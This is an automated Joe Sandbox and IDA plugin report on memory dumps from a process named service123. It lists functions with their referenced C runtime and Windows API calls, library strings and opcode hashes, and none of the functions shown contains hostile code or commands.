Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: d807fc553b930549ed1fe9d3fd1cb7509c668360d24db30f86af6e9c5392a707
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: AA6108B4A0970ACFC714DF29C19065AFBE0EF98758F14892DF9999B760E730E844CB52

Function 6C2B0970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2492A3,00000003), ref: 6C2B09ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2492A3,00000003), ref: 6C2B0A2C

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: ee4c412c675a60c24a7d52e74b80494a85123fbbaf0ce801aa5077ef401e2bc0
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 4561E2B450974ACFC704DF19C19065AFBE0AF99798F10C91EE8EA9B761D730E844CB82

Function 6C2B2B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C2A736E), ref: 6C2B2C03

Strings

basic_string::_M_create, xrefs: 6C2B2C1A, 6C2B2CBA
basic_string::basic_string, xrefs: 6C2B2D0C, 6C2B2D69
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2B2D14, 6C2B2D71, 6C2B2DD6
string::string, xrefs: 6C2B2DCE

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 828a8765a36b9f21bd9ff54c98e13ab2f60f86fb3a8efedd209747a0ef54d631
Instruction ID: 3aff700bedc651d1c3a9ed7787413dd7a8fd14b3f6edd5aca09aa1b1cbec1835
Opcode Fuzzy Hash: 828a8765a36b9f21bd9ff54c98e13ab2f60f86fb3a8efedd209747a0ef54d631
Instruction Fuzzy Hash: E07150B69093558FC300DF2CD48068AFBE4BF99358F55CAAEE8889B315D335D845CB92

Function 6C21EB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: dd4a1b5529688c4aef1cdb10beaab5512e3796d45e6d493980e73252c5389c51
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 72618A7561D30D8FC300CF19C88865AB7E5AF88318F448A2AFE989BF44D730D9468B96

Function 6C22B060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C22AF3F), ref: 6C2E5FF0
abort.MSVCRT(?,?,?,?,?,?,6C22AE9C,?,?,?,?,?,?,6C2E6040), ref: 6C2E5FF8
abort.MSVCRT(?,?,?,?,?,?,6C22AE9C,?,?,?,?,?,?,6C2E6040), ref: 6C2E6000
abort.MSVCRT(?,?,?,?,?,?,6C22AE9C,?,?,?,?,?,?,6C2E6040), ref: 6C2E6008

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 06348094b40e09aa322b5d6b8b3e0ed8046e9ae4a22011d11bc15998ab22fb93
Instruction ID: b61ae74c5a5bbf69e21429fd7d622d7dc34047680aeb50cbcaaa7d9e251f1e18
Opcode Fuzzy Hash: 06348094b40e09aa322b5d6b8b3e0ed8046e9ae4a22011d11bc15998ab22fb93
Instruction Fuzzy Hash: 7E41257160430D8BCB00AF38C4C16AAB7E1FF86318F54886DDC859BB25DB3AD44ACB91

Function 6C211020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C211281,?,?,?,?,?,?,6C2113AE), ref: 6C211057
_amsg_exit.MSVCRT ref: 6C211086

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 025fef1fd01a2df560f871f822638f93509632a8e1b12cd8940f95204baa63b5
Instruction ID: d026aa7f68411adf0684d14cb7b0c3c05d3232e57b1097a12655fc19df49eee7
Opcode Fuzzy Hash: 025fef1fd01a2df560f871f822638f93509632a8e1b12cd8940f95204baa63b5
Instruction Fuzzy Hash: 3F314F7060D289CBEB10DF69C68179AB6F8EB56394F104529EE488BE40DA39C484DB92

Function 6C231F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C231F18
strlen.MSVCRT ref: 6C231F22
memcpy.MSVCRT ref: 6C231F3F
setlocale.MSVCRT ref: 6C231F52
wcsftime.MSVCRT ref: 6C231F76
setlocale.MSVCRT ref: 6C231F88

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: 91b431d13136445b8b86c89749f9f06398b659ab81671e7514127fb328b4735e
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: CF1193B1A09314AFD340BF69C58465EBBE4BF88754F418C2DF8C887710E7799854CB92

Function 6C231C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C231C68
strlen.MSVCRT ref: 6C231C72
memcpy.MSVCRT ref: 6C231C8F
setlocale.MSVCRT ref: 6C231CA2
strftime.MSVCRT ref: 6C231CC6
setlocale.MSVCRT ref: 6C231CD8

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: 685728edc4d17fc60bd971fcbfc8a3ecd29f0f81b358a6dd283902012ab8ddc3
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: A011D0B1909318AFD340BF68C08475EBBE4BF88644F418C2EE8C88B711E7789854CB92

Function 6C21ED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 07a09813012d5972666d661f73a8e4d304ea081898fa64dc4521c8898523b669
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 50B01231CDD3ADC5C52065BC08557DEE28DA717344F80080BCF5673C0DC633A0834586

Function 6C22E0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C22E117
LocalFree.KERNEL32 ref: 6C22E14B

Strings

basic_string: construction from null is not valid, xrefs: 6C22E1A7
Unknown error code, xrefs: 6C22E18C

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: 306b95cc0c7f83e624a7e435f2c185a6adb117d8e72d4a0ca2a3027454758871
Instruction ID: a673eb8818580fe136a32abe9defd787831f3d49242f80c0084b19182a05b0a6
Opcode Fuzzy Hash: 306b95cc0c7f83e624a7e435f2c185a6adb117d8e72d4a0ca2a3027454758871
Instruction Fuzzy Hash: D8415CB290570D9BCB00AF68C48569EFBF4FF89715F41882CE994ABB10D77494498BD2

Function 006C2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006C2E97
fputc.MSVCRT ref: 006C2F07
memset.MSVCRT ref: 006C2FC2

Strings

o, xrefs: 006C2FCA
0, xrefs: 006C2FB7

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: ab373a00139fa4b64adca82d3322d9210f524d7cdb31048d76f50c51b076926c
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 5A313672A042168BCB10CF68C0A4BAABBF2FF5C710F15852DD999AB352D738E9418B54

Function 6C223659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C223567
fputc.MSVCRT ref: 6C2235D7
memset.MSVCRT ref: 6C223692

Strings

o, xrefs: 6C22369A
0, xrefs: 6C223687

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 98797512d612c5142782e4bd96071949d1b5bb3810b0d57be96f56aa169c32a0
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: EC314C71A083098BCB00CF69C0807AABBF9BF48314F148659ED99ABB51D73CE915CB50

Function 6C219490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C2194C2
strlen.MSVCRT ref: 6C219616

Strings

_GLOBAL_, xrefs: 6C2194B7

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: bc30176210ab71065b221c65e3e6e372d5c5cd74fc84e85a5a41109049a6c236
Instruction ID: 39207f26d76a04e55783b0d51870e0a003e2382445b44a778e143b9210a92f69
Opcode Fuzzy Hash: bc30176210ab71065b221c65e3e6e372d5c5cd74fc84e85a5a41109049a6c236
Instruction Fuzzy Hash: 8CF191B0D0821D8FEB20DF29C8903DDBBF1AF46308F1441E9D949ABA45D7759A99CF81

Function 6C28DAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C2AF8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AF95D
Part of subcall function 6C2AF8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AF988

memcpy.MSVCRT ref: 6C28DCB5

Part of subcall function 6C2B2530: memcpy.MSVCRT(?,-00000001,?,6C23749E,?,?,?,?,?,?,?,?,?,?,?,6C238E25), ref: 6C2B256C

Strings

iostream error, xrefs: 6C28DD08
Unknown error, xrefs: 6C28DB08
basic_string::append, xrefs: 6C28DDB2, 6C28DDBE

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: d8a694ed06b1bb7f407b2fb0415ede591e07f964dc2847a9e39da3e3dbd8fc1f
Instruction ID: d1b294f836f00b6f0baf81873192c365950f4d660db4be44a1c062b24777262d
Opcode Fuzzy Hash: d8a694ed06b1bb7f407b2fb0415ede591e07f964dc2847a9e39da3e3dbd8fc1f
Instruction Fuzzy Hash: DCA1E2B5D0531ECBCB14DFA8C48069DBBB1BF48314F64892AE894AB791E7309849CF81

Function 6C27BF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C27C03F
memcpy.MSVCRT ref: 6C27C099
memcpy.MSVCRT ref: 6C27C127

Part of subcall function 6C27C500: memcpy.MSVCRT ref: 6C27C58C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C27C1B3
basic_string::replace, xrefs: 6C27C194, 6C27C1A7

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 155e21168aacd309ec335e2d5d91fb24bfdca23ebffa5627a21bba01f2090951
Instruction ID: e49d40c7dff3e6244bce376f210689107d26684cfbe17cc531bc91d9791a0da2
Opcode Fuzzy Hash: 155e21168aacd309ec335e2d5d91fb24bfdca23ebffa5627a21bba01f2090951
Instruction Fuzzy Hash: 40813671A052199FCB10EF3CC48469EBBE1BF88B14F118929EC98D7710E731D954CBA2

Function 6C285000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2850D0
memcpy.MSVCRT ref: 6C285124
memcpy.MSVCRT ref: 6C2851B8

Part of subcall function 6C285590: memcpy.MSVCRT ref: 6C285620

Strings

basic_string::replace, xrefs: 6C285229, 6C28523C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C285248

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 8aea9723ec962a4dd704f197a8240effe8b386ddf909a529d141210dcc8b164e
Instruction ID: 60e662484107640efcc1d0cc317627b113885bd9c15f3007c65f49bec5483e57
Opcode Fuzzy Hash: 8aea9723ec962a4dd704f197a8240effe8b386ddf909a529d141210dcc8b164e
Instruction Fuzzy Hash: E4813771A0A2099FCB00DF6CC48059EBBE5AF88354F54892EEC9AD7750D731E8488B92

Function 6C28D810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2AF8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AF95D
Part of subcall function 6C2AF8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C28DA2E), ref: 6C2AF988

strlen.MSVCRT ref: 6C28D8E5
memcpy.MSVCRT ref: 6C28D9BE

Strings

iostream error, xrefs: 6C28DA12
Unknown error, xrefs: 6C28D85E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 6b7f6b28939af0735d87781681a6c044b1a2213c30bf1d63b89b88a23d84bc1f
Instruction ID: b842542b07793b4395f2af083b2531c8bd4b1a3840f8f1dd51be15133a8495ee
Opcode Fuzzy Hash: 6b7f6b28939af0735d87781681a6c044b1a2213c30bf1d63b89b88a23d84bc1f
Instruction Fuzzy Hash: 2F61D4B0905309CFDB04DFA9C08469EBBF1BF88314F14896EE8989B755E7749849CF91

